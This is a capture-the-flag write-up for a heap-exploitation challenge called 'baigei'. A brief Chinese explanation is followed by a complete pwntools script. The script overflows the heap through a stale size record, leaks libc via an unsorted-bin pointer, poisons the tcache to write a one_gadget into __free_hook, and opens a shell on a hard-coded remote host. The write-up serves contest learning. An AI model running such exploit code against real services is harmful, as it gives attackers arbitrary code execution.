baigei
思路
第一次比赛里做出pwn题。。。
add 函数在检查输入的 size 之前就把它写入了 size 记录数组：分配被拒绝后这条记录仍然保留，随后 edit 按这个过大的 size 写入，造成堆溢出。
利用 chunk overlap 读出 unsorted bin 中空闲 chunk 的 fd 指针（main_arena+96），从而泄露 libc 基址。
然后用 tcache poisoning 把 __free_hook 改成 one_gadget，再调用一次 free 触发。
wp
from pwn import *
# Shorthands around the pwntools tube `p`, which this script creates further
# down; none of them touch the tube at definition time.
# NOTE(review): the payloads below concatenate str with p64() output and rely
# on str(data) turning ints into decimal text, i.e. Python 2 pwntools — TODO
# confirm the interpreter this is meant to run under.


def s(data):
    """Send `data` as-is (no trailing newline)."""
    return p.send(data)


def sa(text, data):
    """Wait until `text` arrives, then send str(data) without a newline."""
    return p.sendafter(text, str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until `text` arrives, then send str(data) plus a newline."""
    return p.sendlineafter(text, str(data))


def r(num=4096):
    """Receive up to `num` bytes."""
    return p.recv(num)


def ru(text):
    """Receive everything up to and including `text`."""
    return p.recvuntil(text)


def uu32():
    """Read until a 0xf7 byte and unpack the trailing 4 bytes as a u32.

    0xf7 is presumably the high byte of a 32-bit libc address; the
    zero-padding only matters if fewer than 4 bytes were received.
    """
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def uu64():
    """Read until a 0x7f byte and unpack the trailing 6 bytes as a u64.

    A 64-bit userland libc pointer typically has 6 significant bytes ending
    in 0x7f, so the slice is padded with two zero bytes to make a full word.
    Fragile if the program prints another 0x7f byte before the leak.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def lg(name, data):
    """Log `data` as a hex value tagged with `name` via the tube's logger."""
    return p.success(name + "-> 0x%x" % data)
# Verbose tube logging: every byte sent and received is printed. Handy while
# shaping the heap, very noisy once the exploit works.
context.log_level = 'debug'

# 1 = run ./main locally (useful together with dbg()), anything else = attack
# the remote instance.
test = 0
p = process('./main') if test == 1 else remote('113.201.14.253', '21111')

elf = ELF('./main')
# NOTE(review): elf.libc resolves the libc of the *local* machine. The
# __free_hook symbol offset taken from it, and the hard-coded main_arena /
# one_gadget offsets further down, are only valid if the remote target runs
# the same libc build — TODO confirm.
libc = elf.libc
def cmd(choice):
    """Answer the '>>' menu prompt with option number `choice`."""
    p.sendlineafter('>>\n', str(choice))
def add(idx, size, content):
    """Menu option 1: allocate slot `idx` with `size` bytes and fill it with `content`.

    `content` is sent raw (no newline appended), so its length is up to the
    caller.
    """
    p.sendlineafter('>>\n', '1')
    p.sendlineafter('idx?\n', str(idx))
    p.sendlineafter('size?\n', str(size))
    p.sendafter('content?\n', content)
def badadd(idx, size):
    """Menu option 1 with an over-sized `size`, stopping before any content is sent.

    Per the writeup, the target records `size` for slot `idx` before
    validating it and then refuses the allocation, so no 'content?' prompt
    is expected here; the stale size is what later lets edit() overflow.
    """
    p.sendlineafter('>>\n', '1')
    p.sendlineafter('idx?\n', str(idx))
    p.sendlineafter('size?\n', str(size))
def edit(idx, size, content):
    """Menu option 3: overwrite slot `idx` with `content`, declaring `size` bytes.

    `content` is sent raw; the declared `size` is whatever the target accepts
    for this slot (after badadd() that is the bogus recorded size).
    """
    cmd(3)
    for prompt, value in (('idx?\n', idx), ('size?\n', size)):
        sla(prompt, value)
    p.sendafter('content?\n', content)
def show(idx):
    """Menu option 4: ask the target to print the contents of slot `idx`.

    The caller reads the output itself (see uu64()).
    """
    p.sendlineafter('>>\n', '4')
    p.sendlineafter('idx?\n', str(idx))
def delete(idx):
    """Menu option 2: free slot `idx`."""
    p.sendlineafter('>>\n', '2')
    p.sendlineafter('idx?\n', str(idx))
def dbg():
    """Attach gdb to the live tube and block until the operator continues.

    Meant for the local run (test == 1); not called anywhere in the final
    exploit flow.
    """
    gdb.attach(p)
    pause()
# Stage 1: ten adjacent chunks from 0xf0-byte requests, then free them in an
# order that (intended effect, glibc tcache) fills the bin for this size with
# slots 0-5 and 9 before 6, 7 and 8 are freed, so those three land in the
# unsorted bin and coalesce into one free region.
for idx in range(10):
    add(idx, 0xf0, 'a')
for idx in range(6):
    delete(idx)
for idx in (9, 6, 7, 8):
    delete(idx)
# Stage 2: seven allocations drain the tcache, the next three are carved out
# of the coalesced region so slots 7/8/9 are adjacent again. Refill the
# tcache with 0-5 and 8, free 7 (intended: it falls through to the unsorted
# bin), then take 8 back from the tcache.
for idx in range(7):
    add(idx, 0xf0, 'a')
for idx in (7, 8, 9):
    add(idx, 0xf0, 'a')
for idx in range(6):
    delete(idx)
delete(8)
delete(7)
add(8, 0xf0, 'a')

# The bug: the refused 0x500 request still leaves 0x500 recorded as slot 8's
# size, so edit() now writes past the 0xf0-byte chunk. The bytes at offsets
# 0xf0 and 0xf8 land on the following chunk's prev_size and size fields:
# prev_size = 0x200 and size = 0x100 with PREV_INUSE clear, i.e. "a 0x200-byte
# free chunk sits in front of me".
badadd(8, 0x500)
overflow = '\x00' * 0xf0 + p64(0x200) + p64(0x100)
edit(8, 0x400, overflow)
# Stage 3: free 6 to fill the tcache again, so freeing 9 takes the regular
# free path; with its PREV_INUSE bit cleared it is meant to consolidate
# backwards over the forged 0x200 prev_size into free slot 7, swallowing
# slot 8 which is still allocated (the overlap). Drain the tcache and split
# the big chunk once more so that a free unsorted-bin chunk now starts at
# slot 8's memory.
delete(6)
delete(9)
for idx in range(7):
    add(idx, 0xf0, 'a')
add(7, 0xf0, 'a')
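# Stage 4: slot 8 aliases a free unsorted-bin chunk, so show(8) prints its fd
# pointer; the `- 96` assumes that fd points at the unsorted-bin head inside
# main_arena (main_arena + 0x60 on 64-bit glibc).
show(8)

# Target-libc specific constants. 0x3EBC40 looks like the main_arena offset of
# the Ubuntu 18.04 glibc 2.27 build and 0x4f432 a one_gadget of the same
# build; both are useless against any other libc, and the one_gadget's
# register/stack constraints must hold at the free() that triggers it.
# TODO confirm against the remote libc.
MAIN_ARENA_OFF = 0x3EBC40
ONE_GADGET_OFF = 0x4f432

libc_base = uu64() - 96 - MAIN_ARENA_OFF
# Fail fast before any write: a libc base is page aligned, so a misaligned
# value means the leak was parsed wrongly or the offsets belong to a
# different libc. Continuing would poison the tcache with a bogus
# __free_hook address and only crash the target.
if libc_base & 0xfff:
    raise ValueError('libc_base 0x%x is not page aligned: bad leak or wrong libc offsets' % libc_base)
lg('libc_base', libc_base)

# __free_hook offset comes from the *local* libc object (elf.libc); it only
# matches the remote if the builds are identical.
free_hook = libc.sym['__free_hook'] + libc_base
one = libc_base + ONE_GADGET_OFF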
# Stage 5: tcache poisoning. Slot 9 is taken from the leftover unsorted chunk
# (presumably the same memory slot 8 points at) and freed into the now-empty
# tcache bin for this size. The same size-bookkeeping bug on slot 7, the
# chunk immediately before it, overflows into its header: the 0xf8 zero bytes
# cover slot 7's data plus the next chunk's prev_size, 0x101 keeps the size
# field sane, and the tcache `next` pointer is replaced by &__free_hook.
add(9, 0xf0, 'a')
delete(9)
badadd(7, 0x500)
poison = '\x00' * 0xf8 + p64(0x101) + p64(free_hook)
edit(7, 0x400, poison)

# First allocation pops the poisoned chunk, the second hands out __free_hook
# itself; store the one_gadget there and fire it with any free().
add(1, 0xf0, 'a')
add(2, 0xf0, p64(one))
delete(3)
p.interactive()